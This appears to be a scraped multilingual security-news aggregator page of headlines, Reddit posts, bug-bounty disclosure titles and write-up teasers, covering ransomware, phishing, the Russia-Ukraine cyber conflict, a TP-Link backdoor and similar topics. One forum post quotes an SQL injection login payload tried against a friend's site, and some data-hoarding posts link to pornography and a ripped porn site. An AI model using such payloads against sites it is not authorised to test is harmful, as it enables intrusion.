    俄罗斯闪战乌克兰,网络战早已打响
    俄乌冲突持续发酵已久。
    2021社交媒体攻击又创记录,金融安全仍在榜首
    社交媒体已成为黑客分发威胁渠道之一,在整个2021年这个渠道的攻击次数增加了两倍。
    支付赎金后勒索软件勒索并未停止
    一项关于勒索软件受害者经历的全球调查强调了勒索软件参与者缺乏可信度,因为在大多数支付赎金的情况下,勒索仍在继续。
    3月11日晚19点 | 安全基建下,如何建设资产识别能力
    3月11日(周五)晚上19:00,阿里巴巴集团安全部高级安全专家-阿刻将为我们带来主题为《新安全基建下,如何建设资产识别能力》的公开课。
    华硕子公司ASUSTOR遭攻击,被勒索上千万元赎金
    此次勒索攻击波及全球众多用户,并在ASUSTOR论坛上引起来广泛讨论。
    数据中心基础设施的运维与管理
    为规范数据中心基础设施的运维管理,各企事业单位应参照相关国家标准建立运维管理体系、制度、流程等措施,保证信息化业务安全、稳定、正常运行。
    利用撞库攻击,一尼日利亚黑客将他人工资据为己有
    从2017年7月开始,攻击者累计入侵了5500个用户账户,总共转移了80万美元。
    安全第一季-【事无小事安全先行】
    病毒是一种暗中感染计算机系统并进行破坏的程序。病毒代码潜藏在其它程序、硬盘分区表或引导扇区中等待时机
    微软洞察:身份管理漏洞成为数字安全首要威胁
    过去两年,疫情影响下的新常态加速了全球范围内的数字化转型,数字化能力已经成为企业与个人生存与发展的核心能力。
    网络犯罪案例分析-非法获取APP数据(四十二)
    为牟私利,非法获取APP数据,构成非法获取计算机信息系统数据罪,判处有期徒刑四年六个月。
    不可见,无安全!值得关注的十大国外SASE厂商(2022版)
    传统的网络安全防护措施将不能够满足复杂的网络架构,提升网络可见性将是未来网络安全防护技术的重要发展趋势。
    大和证券(中国)招聘了!信息安全管理岗等你来投
    大和证券(中国)有限责任公司是一家落户中国北京的新设外资控股证券公司。
  • Open

    Знакомство с Fuzzing в Go
    В релизе 1.18 будет добавлена поддержка fuzzing. Continue reading on Medium »
  • Open

    Знакомство с Fuzzing в Go
    В релизе 1.18 будет добавлена поддержка fuzzing. Continue reading on Medium »
  • Open

    路由器 TP-Link WR740 后门漏洞
    作者:IOTsec-Zone 原文链接:https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 描述 测试环境:Ubuntu 18.04 固件版本:wr740nv1_en_3_12_4_up(100910).bin 产品厂商:TP-Link 厂商地址:https://www.tp-link.com.cn/ ZoomEye搜索app:TP...
    路由器 TP-Link WR740 后门漏洞
    作者:IOTsec-Zone 原文链接:https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 描述 测试环境:Ubuntu 18.04 固件版本:wr740nv1_en_3_12_4_up(100910).bin 产品厂商:TP-Link 厂商地址:https://www.tp-link.com.cn/ ZoomEye搜索app:TP...
    CodeQL 与 Shiro550 碰撞
    作者:SummerSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org JDK内置 上文说到,在JDK8u中查到了结果,一共又7个类可以替代ComparableComparator类。但可以直接调用实例化的类只用两个,String#CASE_INSENSITIVE_ORDER和AttrCompare,其他5个类权限...
    CodeQL 与 Shiro550 碰撞
    作者:SummerSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org JDK内置 上文说到,在JDK8u中查到了结果,一共又7个类可以替代ComparableComparator类。但可以直接调用实例化的类只用两个,String#CASE_INSENSITIVE_ORDER和AttrCompare,其他5个类权限...
  • Open

    路由器 TP-Link WR740 后门漏洞
    作者:IOTsec-Zone 原文链接:https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 描述 测试环境:Ubuntu 18.04 固件版本:wr740nv1_en_3_12_4_up(100910).bin 产品厂商:TP-Link 厂商地址:https://www.tp-link.com.cn/ ZoomEye搜索app:TP...
    路由器 TP-Link WR740 后门漏洞
    作者:IOTsec-Zone 原文链接:https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 描述 测试环境:Ubuntu 18.04 固件版本:wr740nv1_en_3_12_4_up(100910).bin 产品厂商:TP-Link 厂商地址:https://www.tp-link.com.cn/ ZoomEye搜索app:TP...
    CodeQL 与 Shiro550 碰撞
    作者:SummerSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org JDK内置 上文说到,在JDK8u中查到了结果,一共又7个类可以替代ComparableComparator类。但可以直接调用实例化的类只用两个,String#CASE_INSENSITIVE_ORDER和AttrCompare,其他5个类权限...
    CodeQL 与 Shiro550 碰撞
    作者:SummerSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org JDK内置 上文说到,在JDK8u中查到了结果,一共又7个类可以替代ComparableComparator类。但可以直接调用实例化的类只用两个,String#CASE_INSENSITIVE_ORDER和AttrCompare,其他5个类权限...

  • Open

    [NSFW] Pornographic Images
    Public nudity - enjoy https://public.flashingjungle.com/exhibitionism/ submitted by /u/-Phinet- [link] [comments]
    DorkSearch is a tool that gives you a list of prebuilt templates for Google Dorks for different use cases.
    submitted by /u/pentestscribble [link] [comments]
    Hollywood Movies 1900-2020 - If download is slow, cancel and try again after 30 seconds.
    submitted by /u/SatansMoisture [link] [comments]
    Bit more porn...
    This site I have already ripped and made into torrent but it's still up... itaporno Remember use a VPN if you rip it... submitted by /u/xanderTgreat [link] [comments]
  • Open

    Looking for Place to Find latest Computer Forensic Case News
    I'm currently enrolled in a Digital Forensics class and have to do a project where we do a presentation on a current technology or case in Digital Forensics. Anybody know of a good way to find these articles, like what to put in the search bar or what websites to best check out? submitted by /u/Mattdarkninja [link] [comments]
    Windows 10 reset artifacts
    Can someone help me to find traces of artifacts left on windows 10 machine which has been reset 5 months back and repurposed to another user? A reference material on finding windows 10 reset and refresh artifacts will be very useful. Also, suggestions on any tool that can be used to recover data. submitted by /u/Pepperknowsitall [link] [comments]
    Putting user behind keyboard/knowledge
    If files are found automatically synced to a computer, no evidence that suspect had knowledge of them (folder never opened, file never viewed)… also the file was not downloaded by any deliberate action. Cannot determine who uploaded them in the first place or device used to do so Is it enough to make a case based on name on the account when multiple individuals reside at a place? submitted by /u/Complete-Cockroach80 [link] [comments]
    Newcomer to the field
    If this post is against rules in any way I apologize and please take it down.| Greetings everyone. I graduated last year and got my bachelors in digital forensics and decided to stay in my country for a while and try to get a job here (Puerto Rico). Sadly I have not and am considering moving to the US and get a job there. Any advice? Sites to search for job offers for this area for graduates? States I should stay away from because of high cost of living? Any help I would appreciate greatly. submitted by /u/andrew9514 [link] [comments]
  • Open

    Automating bug bounties
    submitted by /u/pedro_benteveo [link] [comments]
    The vulnerability research team @GitLab is introducing an open-source community-driven advisory database for third-party security dependencies
    submitted by /u/howie1001 [link] [comments]
    Remote Code Execution in pfSense <= 2.5.2
    submitted by /u/smaury [link] [comments]
    tmp.0ut Volume 2
    submitted by /u/VVX7 [link] [comments]
    You can still CSRF POST requests under the default browser SameSite cookie policy. How to jump through the required hoops.
    submitted by /u/MysteriousHotel3017 [link] [comments]
    Cyrus SASL 2.1.28 has been released with SCRAM improvements and CVE fixes
    submitted by /u/Neustradamus [link] [comments]
  • Open

    Bug Bounty: Do You Need To Be A Programmer?
    Disclaimer: we are talking about the research of web applications only. Continue reading on Medium »
    Beginner Bug Bounty Journey
    # Introduction Continue reading on Medium »
    What You can Learn from Coinbase Hack with USD250k Bounty
    As a bug bounty hunter, you may experience something like below: Continue reading on Medium »
    How to hunt for bug bounties
    The first step when looking for bug bounties is to get to know the target. Continue reading on System Weakness »
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    Never attended a virtual networking event before? Your FAQs answered + Check our live demo here. Continue reading on InfoSec Write-ups »
  • Open

    How to use satellite imagery to visualise changes in landscapes
    And how those changes can help you chronolocate an event. Continue reading on Medium »
    Geolocating TikTok videos of Russian military vehicles near Ukraine
    A little persistence can help pinpoint locations Continue reading on Medium »
    Bus and Rocks— OSINT Challenge 19 and 20
    Quiztime (contributor @kollege and @mahrko) shared two OSINT quizzes with us. Both objects were kind of wired. For kollege's we have to… Continue reading on Medium »
  • Open

    Pentesting a windows box
    Hello everyone! Just a question how do you start a windows box? I am doing some HTB this past few weeks and only testing the linux boxes, now how you guys learned to pentest a windows box? (I dont have any background on ActiveDirectory stuffs) Thank you! submitted by /u/pldc_bulok [link] [comments]
    Implications of disabled, factory install of Facebook on Android device.
    I do not use Facebook ,but it came pre-installed on my phone. I can't uninstall it because Zuck owns my phone, but I have disabled the app and reverted it to the original factory install. I'm concerned about having an extremely out-of-date version remaining, probably rife with security flaws. Does Disabling the app effectively lock it out from receiving or transmitting? submitted by /u/spinfip [link] [comments]
    Email compromised, address spoofed, or elaborate phishing email?
    Not sure if this is the best subreddit to ask about this. Let me know if there's a better subreddit for this post. My email account has a unique, very strong password and two-factor authentication. This morning, I noticed in my junk folder there was one of those "failed to deliver" emails meant for another address, like those undeliverable emails when you get when you try to email an address that doesn't exist and it bounces back to you. Interestingly, it came from another domain instead of postmaster@outlook. I never sent this email, I don't see an email like it in sent, and I don't see anything unusual in drafts or sent. I checked the account's login activity and there were no sign-ins, only failed attempts to sign into the account from Asia. I have 2FA enabled so I should've been notified if anyone had attempted to sign into the email account, either today or previously at any point other than when I myself signed in. Furthermore, the bounce back email had my address as the sender, but the contact name on it was just random letters, not my name that I have on my account. Is my email compromised, did someone spoof the address, or is this an elaborate phishing attempt that I'm BCC'd on? submitted by /u/NotMSUPD [link] [comments]
    PluralSight Subscription Expiring, Any Others We Should Look Into Instead?
    After being unemployed for 2 years(stay at home dad) I wanted to rejoin the workforce but wanted to move past helpdesk/desktop level(had 5yrs exp) and decided Cybersecurity was the way to go. I did not have a tech degree, or any other certs and was always a poor student, but I studied my butt off for 2 months and got my Sec+ and a month later landed the dream job making the big bucks!!! aka INFOSEC focused sys admin. Our PluralSight subscription is expiring and before I blow my budget on it and renew it, I wanted to know if there are any others I should be looking into instead? This would be for a team of 2-4 individuals. Ideally looking for an all around system, with the focus on Cloud, INFOSEC, and SCCM. In my current duties I touch everything, SCCM, AWS, Azure, GCP, VmWare, Citrix, C…
    Using Quantitative Risk Metrics to get Csuite buy in?
    When I did my Master's we did a great section on quantitative vs qualitative risk management that I really want to implement. The logic to me seems sound in that a value of asset x should inform the costs you are willing to incur to mitigate risks. Getting away from vague "I feel" statements about cyber risk to quantitatively say asset x is worth y to the company so investing w to reduce risk is basic math the c-suite can get. My barriers to this are: Getting an effective asset valuation as no one seems to track initial investment and sustainment costs let alone cyber security costs. Building this into SOP when tagging assets. Tagging right now is limited so this needs to be fixed too. Anyone here effectively put in quantitative risk practice that can share what worked? submitted by /u/finnthethird [link] [comments]
    what's the deal about ip addresses?
    I know this is so fundamental basic stuff but why is this thing so crucial/ submitted by /u/alicia30765 [link] [comments]
  • Open

    Bolt from HackTheBox — Detailed Walkthrough
    No content preview
    Nibbles From HackTheBox
    No content preview
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    No content preview
    Intercepting Android Emulator SSL traffic with burp using magisk
    No content preview
    [THM] Ignite Writeup
    No content preview
    Mobile phone number verification bypass
    No content preview
  • Open

    Bolt from HackTheBox — Detailed Walkthrough
    No content preview
    Nibbles From HackTheBox
    No content preview
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    No content preview
    Intercepting Android Emulator SSL traffic with burp using magisk
    No content preview
    [THM] Ignite Writeup
    No content preview
    Mobile phone number verification bypass
    No content preview
  • Open

    Bolt from HackTheBox — Detailed Walkthrough
    No content preview
    Nibbles From HackTheBox
    No content preview
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    No content preview
    Intercepting Android Emulator SSL traffic with burp using magisk
    No content preview
    [THM] Ignite Writeup
    No content preview
    Mobile phone number verification bypass
    No content preview
  • Open

    Bash Tricks for Command Execution and Data Extraction over HTTP/S
    submitted by /u/cyberbutler [link] [comments]
    What’s Next in Microsoft Sentinel?
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-02-23 Review
    Bvp47 美国NSA方程式的顶级后门 技术细节 by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2022-02-23 Review
    Bvp47 美国NSA方程式的顶级后门 技术细节 by ourren 更多最新文章,请访问SecWiki
  • Open

    Deliviry Club Courier app (v. 3.9.25.0); Disclosure phone number of client.
    Mail.ru disclosed a bug submitted by 388: https://hackerone.com/reports/1382570 - Bounty: $150
    Add upto 10K rupees to a wallet by paying an arbitrary amount
    Zomato disclosed a bug submitted by ashoka_rao: https://hackerone.com/reports/1408782 - Bounty: $2000
    Incorrect authorization to the intelbot service leading to ticket information
    TikTok disclosed a bug submitted by johnstone: https://hackerone.com/reports/1328546 - Bounty: $15000
  • Open

    黑客利用 Qbot 和 Zerologon 漏洞导致整个域感染
    译者:知道创宇404实验室翻译组 原文链接:https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ 在这次入侵中(从2021年11月开始) ,一个黑客通过使用Qbot(又名 Quakbot/Qakbot)恶意软件在环境中获得了最初的立足点。 在 Qbot 有效载荷执行后不久...
    黑客利用 Qbot 和 Zerologon 漏洞导致整个域感染
    译者:知道创宇404实验室翻译组 原文链接:https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ 在这次入侵中(从2021年11月开始) ,一个黑客通过使用Qbot(又名 Quakbot/Qakbot)恶意软件在环境中获得了最初的立足点。 在 Qbot 有效载荷执行后不久...
    《Chrome V8 源码》—— "Equal" 与 "StrictEqual" 为什么不同
    作者:灰豆 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 介绍 substring、getDate、catch 等是常用的 JavaScript API,接下来的几篇文章将对 V8 中 API 的设计思想、源码和关键函数进行讲解,并通过例子讲解 JavaScript 在 V8 中的初始化、运行方式,以及它与...
    《Chrome V8 源码》—— "Equal" 与 "StrictEqual" 为什么不同
    作者:灰豆 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 介绍 substring、getDate、catch 等是常用的 JavaScript API,接下来的几篇文章将对 V8 中 API 的设计思想、源码和关键函数进行讲解,并通过例子讲解 JavaScript 在 V8 中的初始化、运行方式,以及它与...
  • Open

    黑客利用 Qbot 和 Zerologon 漏洞导致整个域感染
    译者:知道创宇404实验室翻译组 原文链接:https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ 在这次入侵中(从2021年11月开始) ,一个黑客通过使用Qbot(又名 Quakbot/Qakbot)恶意软件在环境中获得了最初的立足点。 在 Qbot 有效载荷执行后不久...
    黑客利用 Qbot 和 Zerologon 漏洞导致整个域感染
    译者:知道创宇404实验室翻译组 原文链接:https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ 在这次入侵中(从2021年11月开始) ,一个黑客通过使用Qbot(又名 Quakbot/Qakbot)恶意软件在环境中获得了最初的立足点。 在 Qbot 有效载荷执行后不久...
    《Chrome V8 源码》—— "Equal" 与 "StrictEqual" 为什么不同
    作者:灰豆 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 介绍 substring、getDate、catch 等是常用的 JavaScript API,接下来的几篇文章将对 V8 中 API 的设计思想、源码和关键函数进行讲解,并通过例子讲解 JavaScript 在 V8 中的初始化、运行方式,以及它与...
    《Chrome V8 源码》—— "Equal" 与 "StrictEqual" 为什么不同
    作者:灰豆 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 介绍 substring、getDate、catch 等是常用的 JavaScript API,接下来的几篇文章将对 V8 中 API 的设计思想、源码和关键函数进行讲解,并通过例子讲解 JavaScript 在 V8 中的初始化、运行方式,以及它与...
  • Open

    Types of attacks I have learned
    Man in the middle attack Continue reading on Medium »
  • Open

    研究显示,高速增长企业伴随着更高的黑客风险
    根据美国无密码身份平台提供商Beyond Identity的最新研究显示,相比于增长率平缓的公司,高速增长的公司遭遇网络安全漏洞攻击的可能性更大。
    2021年91%的英国组织遭到邮件钓鱼攻击
    根据Proofpoint的2022年网络钓鱼情况报告,去年,超过十分之九(91%)的英国组织被邮件钓鱼成功入侵 。
    这样的钓鱼邮件,你会中招吗?
    钓鱼邮件无处不在,如何防范可得擦亮眼睛。
    注意,谷歌MFA验证拦不住这类网络钓鱼攻击
    一种新型的网络钓鱼攻击却可以绕过MFA,攻击者利用VNC屏幕共享系,让目标用户直接在攻击者控制的服务器上登录其帐户,因此可绕过MFA。
    倒计时15天!CIS2021 Spring·春日版直播邀您线上相聚
    3月9日,让我们相约线上直播,不见不散~
    FreeBuf早报 | DDoS攻击在 2021 年呈螺旋式上升;Sea Mar被控数据泄露疏忽
    Neustar Security Services 发布了一份报告,详细介绍了 2021 年网络攻击的持续增长,其中DDoS 攻击数量空前。
    电信诈骗黑灰产业链现状(三):免签、代收、代付技术成诈骗主流洗钱方式
    虚假网赚、虚假投资等诈骗场景中,受害人之所以轻易相信对方,缘于骗局早期,能够获得骗子返回的任务佣金。
  • Open

    Rust Related CVE Entries
    Article URL: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=rust Comments URL: https://news.ycombinator.com/item?id=30438575 Points: 2 # Comments: 0
    Cyrus SASL 2.1.28 has been released with SCRAM improvements and CVE fixes
    Article URL: https://www.cyrusimap.org/sasl/sasl/release-notes/2.1/index.html#new-in-2-1-28 Comments URL: https://news.ycombinator.com/item?id=30435871 Points: 1 # Comments: 0

  • Open

    Preparing for the Cyber Impact of the Escalating Russia-Ukraine Crisis
    Recommendations on how to proactively prepare to defend against the potential cyber impact of the escalating Russia-Ukraine crisis. The post Preparing for the Cyber Impact of the Escalating Russia-Ukraine Crisis appeared first on Unit42.
  • Open

    Best CS undergrad programs for a prospective pentester?
    Wondering if anyone here can speak to which college CS programs best prep their students to take on pentesting. I'd prefer a program that focuses on getting me the skills I need to understand the computer and just to give me general depth in my field. I know pentesting is what I want to do professionally, so something that would let me focus on that is preferable. submitted by /u/NotVeryMega [link] [comments]
    Is it possible I could be targeted?
    Kinda what the title says. I started out this morning with the ability to call out. Then my phone just started hanging up instantly. Put Sim in different phone, same thing. Tried calling it, straight to voicemail. Went to Walmart to get a new sim and phone number. Got ten minutes of the ability to make calls, then the same exact thing. Got a new phone, different carrier. Same thing ten minutes, then no more voice ability. Could it be possible some one put out some kinda hit on me? submitted by /u/YddishMcSquidish [link] [comments]
    How much day rate for pentester contractors in the UK?
    Due to an increase surge of work of a new contract, my company needs penetration tester contractors which would be good to use on an ad-hoc basis. What are the typical rates for pentesters and how long do a typical contract go on for? E.g. £500 a day for 3 months for example for someone with 3-5 experience. Is this reasonable pricing? I have been asked to find ones in the UK due to familiarity with certain frameworks like cyber essentials and CREST. It would be great if someone can share some figures so I can know what to expect with varying experience and qualification such as CRT and CCT as well. Thank you. submitted by /u/HamsterMoisture [link] [comments]
    EDR etc for ONE linux box?
    What setup/software/etc do you recommend to protect my personal linux computer? E.g. vectors I see: it could get pwned by malicious python packages, malicious VSCode extensions, malicious NPM etc. Less likely: Browser exploits. I was experimenting with only letting my browser phone out (the usual malware on linux just connects out naively). But then I have to open everything up again to install stuff. ClamAV is a joke, but something like carbon black makes no sense for a single box. Ideas? submitted by /u/medusabadhairday [link] [comments]
    SIEM Onboarding for IaaS/PaaS over Azure/AWS
    As someone who has been witnessing quite an amount of transformation across all sectors. Have been wondering what are the improvements Vendors and OEMs have made on SIEM Onboarding front. Do OEM/Vendors still prefer/recommend syslog, installing proprietary agents or the oh so obsolete RPC(for Windows) to onboard systems or have some vendors/OEMs also started pushing for cloud native solutions like Event Hub/SQS. A lot of vendors do show greenlight on integration with S3/Event Hub but dont support any sort of parsing for these log sources (Windows and Linux), one cannot expect anyone to actually create parsers from scratch for the entire Windows Ecosystem. As large orgs start deploying Control Towers with dedicated logging buckets anyone can poll off and ingest, how do you guys scale your SIEM deployments and utilize these architectural changes ? submitted by /u/w33ha_AD [link] [comments]
    Where to turn on VPN (laptop vs phone) when hotspotting my phone
    Lets get straight to it - I have two questions regarding where to turn on VPN (laptop vs phone) Lets say im at a hotel and would like to hotspot my phone so that I can access the internet using my laptop. Question is, where do i turn on VPN? On my phone or on my laptop? Based on my research, many seem to suggest to turn on VPN on the laptop. My question then, is, what if I would like to browse the internet on my phone? Or do stuff on whatsapp, etc. Must I turn on VPN on my phone for these activities too? submitted by /u/AliveandDrive [link] [comments]
    Is it SQL injection?
    Hey Chief, A friend of mine has set up a website where she used a hosting service, I don't remember its name, The admin login functionality from that hosting service asked for username and password combination, I typed a few SQLi payloads (' or 1=1 kinda stuff) but instead of throwing login password/username incorrect error, it showed pretty unsual error and took pretty long to do so, Is that a sign of SQL based injection? Does that mean the website is likely vulnerable to SQL injection or smtg similar? Please help, because that friend of mine has setup her website for business usage and isn't sure that hosting provider is secure and whatnot. submitted by /u/The_Intellectualist [link] [comments]
    Security automation
    I have been using node-red to automate a couple of daily tasks. for example - enrich alerts with virus total intelligence - test and verify DLP configuration is set up correctly - add IP to block list in AWS WAF - pull metrics from crowd strike to PowerBI for manager report - etc. ​ I am considering writing a blog or sharing in a security talk. Is there anyone interested in this topic? Any good platform to speak about this? submitted by /u/Calm_Scene [link] [comments]
  • Open

    “OSINT Investigations: We know what you did that summer” Notes
    OSINT Investigations: We know what you did that summer by Information Warfare Center is packed with OSINT advice and resources, including… Continue reading on Medium »
    Cybersoc DVLA OSINT writeup
    Following is an OSINT challenge DVLA writeup offered by cybersoc. Continue reading on Medium »
    Wonderland- Tryhackme CTF
    Steps Continue reading on Medium »
    OSINTGRAM
    What is osintgram ? Continue reading on Medium »
    Capture The Talent — Pwn Write-up : Global Pandemic
    From Saturday, February 19 to Sunday, February 20, 2022, the Capture The Talent CTF was held. 🏆Final ranking: 1/52 Continue reading on Medium »
  • Open

    Seeking Freelancer for WeChat Recovery
    Computer Forensics For WeChat - Seeking A Freelancer We need someone who can restore WeChat messages from an iPhone backup. Please contact me privately or details. submitted by /u/P2T-2022 [link] [comments]
    Volatility 3 commands and usage tips to get started with memory forensics. Volatility 3 + plugins make it easy to do advanced memory analysis.
    submitted by /u/DFIRScience [link] [comments]
    Certs
    Any certs you recommend for a cs analyst to get more knowledge and skills in digital forensics? submitted by /u/mooncrestle [link] [comments]
    When carving a file type without a footer, how do I know the range?
    I am doing an assignment, and in the assignment volume, I found a Bitmap header. How do I know the range of the file? My professor said he would go over it but never did submitted by /u/KTthemajicgoat [link] [comments]
  • Open

    Samy Kamkar takes down MySpace
    Greatest Moments in Hacking History: Samy Kamkar Takes Down Myspace — YouTube Continue reading on Medium »
  • Open

    IDOR in "external status check" API leaks data about any status check on the instance
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1372216 - Bounty: $610
    broken authentication (password reset link not expire after use in https://network.tochka.com/sign-up)
    QIWI disclosed a bug submitted by uddeshaya: https://hackerone.com/reports/1401891 - Bounty: $100
    FULL SSRF
    Acronis disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1241149
    Claiming the listing of a non-delivery restaurant through OTP manipulation
    Zomato disclosed a bug submitted by ashoka_rao: https://hackerone.com/reports/1330529 - Bounty: $3250
    api key exposed in github.com//
    8x8 disclosed a bug submitted by adnanmalikinfo: https://hackerone.com/reports/1454965
  • Open

    Paper HackTheBox Write-Up
    Easy box made by Jin Continue reading on Medium »
    The most underrated tool in bug bounty. (and the filthiest one liner possible)
    One liner tool chains for bug bounty, dependent on one vital tool. Continue reading on Medium »
    SQLi: next level
    you may have seen some SQL injections that exploiting them are not as straightforward as what you see in the ethical hacking courses. like… Continue reading on Medium »
    rDEX Bug Bounty Recap
    Overview Continue reading on StaFi »
    PORTSWIGGER WEB SECURITY - XXE (XML EXTERNAL ENTITY) INJECTION LAB ÇÖZÜMLERİ
    XXE (XML External Entity) Injection, bir saldırganın web uygulama üzerinde XML verilerini enjekte etmesine veya değiştirmesine olanak… Continue reading on Medium »
    Behind-the-Scenes of Infosec Writeups
    How the publication grew since 2017, one message at a time. Continue reading on InfoSec Write-ups »
    My Pentest Log -7-
    Greetings to all from Sergius and Bacchus, Continue reading on Medium »
    2FA Misconfiguration leads to adding any number as 2FA verification
    I was testing 2FA on a website. At first, I tried to bypass 2FA but I was not successful, then I thought of something else. What if I can… Continue reading on Techiepedia »
  • Open

    Operation Cache Pandas
    submitted by /u/dmchell [link] [comments]
    Chasing the Silver Petit Potam to Domain Admin
    submitted by /u/ZephrX112 [link] [comments]
  • Open

    How to Fix the specialadves WordPress Redirect Hack
    Attackers are regularly exploiting vulnerable plugins to compromise WordPress websites and redirect visitors to spam and scam websites. This has been an ongoing campaign for multiple years. Payload domains are regularly swapped out and updated, but the objective remains largely the same: trick unsuspecting users into clicking on malicious links to propagate adware and push bogus advertisements onto victim’s desktops. The most recent variation of this WordPress hack involves the following domain: specialadves[.]com If your website is redirecting visitors to pages that look something like this then your website is likely compromised: In today’s post we will review how to remove the specialadves malware from your WordPress website. Continue reading How to Fix the specialadves WordPress Redirect Hack at Sucuri Blog.
  • Open

    Challenge-3 Weekly Cloud Security Challenge
    submitted by /u/0xdeadbeef0000 [link] [comments]
    Horde Webmail 5.2.22 - Account Takeover via Email
    submitted by /u/monoimpact [link] [comments]
  • Open

    For the females & gay members of reddit...
    Not saying you have to be gay to enjoy good looking men getting off ... Has rick & morty, Mr Robot plus other stuff so not all men getting all hot and sweaty... Mp4's images ect... submitted by /u/xanderTgreat [link] [comments]
    Construction Company or not...
    Not been around for a while but found this one and wanted to share it...yep porn... Look in folders...mp4's submitted by /u/xanderTgreat [link] [comments]
    a bunch of electronic music and samples, still looking through it but there's some fun stuff so far
    submitted by /u/subwaytech [link] [comments]
  • Open

    SecWiki News 2022-02-22 Review
    设备指纹技术介绍与综述(一) by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2022-02-22 Review
    设备指纹技术介绍与综述(一) by ourren 更多最新文章,请访问SecWiki
  • Open

    panic: send on closed channel - 채널을 잘 닫자 🕵🏼‍♂️
    고루틴과 채널은 golang에서 가장 핵심적인 기능 중 하나입니다. 다만 꼼꼼하게 체크하고 사용하지 않으면 여러가지 문제들을 만들어낼 수 있습니다. 그 중 하나는 Close된 채널에 값을 전달하는 상황인데요. 이런 경우 Application은 panic으로 종료하게 됩니다. panic: send on closed channel goroutine 1 [running]: main.main() /tmp/sandbox2358964969/prog.go:19 +0xfc 우선 간단한 방법으로 이를 예방할 수 있는데요. 채널에 값을 보내기 전 채널로 아래 safeCheck 함수와 같이 채널의 Close 여부를 체크하고, 결과에 따라서 값의 송신 여부를 결정하면 됩니다.
  • Open

    The cutting-edge conundrum: Why federal agencies can’t compromise on security
    Invicti sat down with Ryan Cote, former CIO for the Department of Transportation, to chat about AppSec in government and how agencies can modernize security. READ MORE
  • Open

    Ethereum/EVM Smart Contract Reverse Engineering & Disassembly
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    国务院发布《国务院办公厅关于加快推进电子证照扩大应用领域和全国互通互认的意见》
    《意见》共计五章十八条,统筹发展和安全,加强电子证照应用全过程规范管理,严格保护商业秘密和个人信息安全,切实筑牢电子证照应用安全防线。
    新型银行木马正通过Google Play商店攻击英国银行用户
    荷兰安全公司Threat Fabric的研究人员发现了一种名为 Xenomorph的新 Android 银行木马,正对欧洲56家银行的用户下手。
    FreeBuf早报 | Meta或因数据难传输而退出欧洲;在线诉讼等司法活动需保护个人隐私
    Meta收到欧盟主要隐私监管机构发来的“修订版”初步决定,有可能影响其向美国传输欧盟用户数据,甚至有可能因此退出欧洲市场。
    管理非人类账户的生命周期以最小化网络攻击
    对于许多组织而言,非人类账户的访问权限通常保持不变。这为网络犯罪分子提供了利用孤立帐户进行未经授权的访问并发起网络攻击的机会。
    数十位 OpenSea 用户 NFT 被盗,损失超 170 万美元
    OpenSea 数十名用户遭受了网络钓鱼攻击,损失了约价值170万美元的NFT。
    安卓用户注意了!黑客利用“一次性”账户开展诈骗
    一个基于僵尸网络的流氓网站关联了数千部受感染的安卓手机,这再次揭露了依托SMS进行账户验证的漏洞。
    3月9日看CIS 2021大会春日版直播,多重福利拿不停!
    3月9日-10日,CIS 2021 Spring·春日版全议题直播将正式开启,福利活动也将提前上线,参与最高可赢取iPhone13!
    炊具巨头Meyer披露了影响员工的网络攻击
    全球第二大炊具分销商Meyer Corporation向美国司法部长办公室披露了影响其数千名员工的数据泄露事件。
  • Open

    Behind-the-Scenes of Infosec Writeups
    No content preview
    Suspicious USB Stick
    No content preview
    CryptoWall Ransomware — Malware Traffic Analysis
    No content preview
    [THM] Dav Writeup
    No content preview
    How I could’ve bypassed the 2FA security of Instagram once again?
    No content preview
  • Open

    Behind-the-Scenes of Infosec Writeups
    No content preview
    Suspicious USB Stick
    No content preview
    CryptoWall Ransomware — Malware Traffic Analysis
    No content preview
    [THM] Dav Writeup
    No content preview
    How I could’ve bypassed the 2FA security of Instagram once again?
    No content preview
  • Open

    Behind-the-Scenes of Infosec Writeups
    No content preview
    Suspicious USB Stick
    No content preview
    CryptoWall Ransomware — Malware Traffic Analysis
    No content preview
    [THM] Dav Writeup
    No content preview
    How I could’ve bypassed the 2FA security of Instagram once again?
    No content preview
  • Open

    伊朗结盟黑客 TunnelVision 积极利用 VMware Horizon 中的 Log4j2 漏洞
